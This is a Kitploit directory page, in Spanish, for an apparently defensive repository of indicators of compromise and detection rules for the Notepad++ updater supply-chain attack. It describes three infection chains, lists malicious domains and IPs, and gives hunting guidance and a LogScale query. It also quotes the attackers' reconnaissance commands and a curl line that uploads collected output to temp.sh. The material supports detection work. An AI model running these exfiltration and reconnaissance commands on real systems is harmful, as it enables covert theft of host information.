Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
notepadpp-supply-chain-iocs — IoCs (indicadores de compromiso) y reglas de detección para el ataque a la cadena de suministro de Notepad++ (CVE-2025-15556) — APT Lotus Blossom, junio–diciembre de 2025. Incluye consultas de Falcon LogScale, reglas YARA/Sigma y mapeo de MITRE ATT&CK. | Kitploit
Herramientas/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Gestión de Indicadores de Compromiso (IOC)Feeds y Agregadores de AmenazasAnálisis de VulnerabilidadesAnálisis ForenseAnálisis de MalwareInteligencia de AmenazasSeguridad de Cadena de SuministroAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Respuesta a Incidentes
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoCs (indicadores de compromiso) y reglas de detección para el ataque a la cadena de suministro de Notepad++ (CVE-2025-15556) — APT Lotus Blossom, junio–diciembre de 2025. Incluye consultas de Falcon LogScale, reglas YARA/Sigma y mapeo de MITRE ATT&CK.

Ver Repositorio
120hace 7 mesesAún no revisado
Compartir

Ataque a la cadena de suministro de Notepad++ — Repositorio de IoCs

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Junio – Diciembre 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Descripción general

Este repositorio contiene una recopilación completa y consolidada de Indicadores de Compromiso (IoCs) relacionada con el ataque a la cadena de suministro de Notepad++ revelado el 2 de febrero de 2026.

Entre junio y diciembre de 2025, un actor de amenazas patrocinado por el estado chino comprometió la infraestructura de alojamiento de Notepad++, secuestrando el mecanismo de actualización integrado (WinGUp) para entregar selectivamente instaladores troyanizados a usuarios específicos. El ataque explotó la falta de verificación criptográfica en el actualizador (anterior a la v8.8.9), lo que permitió la distribución de backdoors personalizados, Cobalt Strike Beacons y payloads de Metasploit.

Datos clave

CVECVE-2025-15556 — Descarga de código sin verificación de integridad
Actor de amenazasLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Período de actividadJunio 2025 – 2 de diciembre de 2025
Vector de ataqueCompromiso de la cadena de suministro a través del actualizador automático WinGUp
ObjetivosGobierno, telecomunicaciones, servicios financieros, proveedores de TI (Filipinas, Vietnam, El Salvador, Australia, Asia Oriental)
MalwareBackdoor Chrysalis (personalizado), Cobalt Strike Beacon, Metasploit Meterpreter
Corregido enNotepad++ v8.8.9+ (verificación de certificados) / v8.9.1+ (validación XMLDSig)

Cadenas de infección

Kaspersky GReAT identificó tres cadenas de infección distintas, rotadas aproximadamente cada mes para evadir la detección:

Cadena n.º 1 — Julio/Agosto 2025

GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • Abusa de una vulnerabilidad antigua en el software ProShow en lugar de DLL sideloading
  • Reconocimiento: whoami && tasklist → exfiltrado vía temp.sh
  • Directorio de trabajo: %appdata%\ProShow\

Cadena n.º 2 — Septiembre/Octubre 2025

GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • Utiliza un intérprete Lua legítimo para ejecutar shellcode compilado
  • Reconocimiento ampliado: whoami && tasklist && systeminfo && netstat -ano
  • Directorio de trabajo: %appdata%\Adobe\Scripts\

Cadena n.º 3 — Octubre 2025

GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • Técnica clásica de DLL sideloading
  • Sin reconocimiento integrado (a diferencia de las cadenas 1 y 2)
  • Directorio de trabajo: %appdata%\Bluetooth\
  • Cobalt Strike Beacon asociado encontrado en C:\ProgramData\USOShared\
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Contenido del repositorio

ArchivoDescripción
notepadpp_supply_chain_iocs.csvConjunto de datos completo de IoCs (105 indicadores) con mapeo MITRE ATT&CK

Esquema del CSV

ColumnaDescripción
ioc_typeTipo: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueEl valor del indicador
chainCadena de infección (1, 2, 3, 1/2, 2/3, all, n/a)
contextDescripción de lo que representa el IoC
sourceFuente de inteligencia (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSeveridad (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueID de técnica MITRE ATT&CK

Detección y caza de amenazas

Indicadores prioritarios (empezar aquí)

De comportamiento — independientes de IoC, de mayor valor:

  • gup.exe generando cualquier proceso hijo distinto de un instalador legítimo y firmado de Notepad++
  • gup.exe conectándose a dominios/IPs distintos de notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Creación de directorios: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Creación de %localappdata%\Temp\ns.tmp\ (entorno de ejecución de NSIS — presente en todas las cadenas)

De red — alta confianza:

  • Resolución DNS de cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Conexiones a temp.sh (51.91.79.17) — especialmente con subida de archivos mediante curl
  • Solicitudes HTTP con URL de temp.sh incrustadas en el encabezado User-Agent
  • Conexiones salientes a 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Comandos de reconocimiento (post-explotación):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

Consultas de CrowdStrike Falcon LogScale

De comportamiento: búsqueda de procesos hijos de GUP.exe
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Búsqueda multi-IoC en eventos de proceso, red y DNS
Descargar herramienta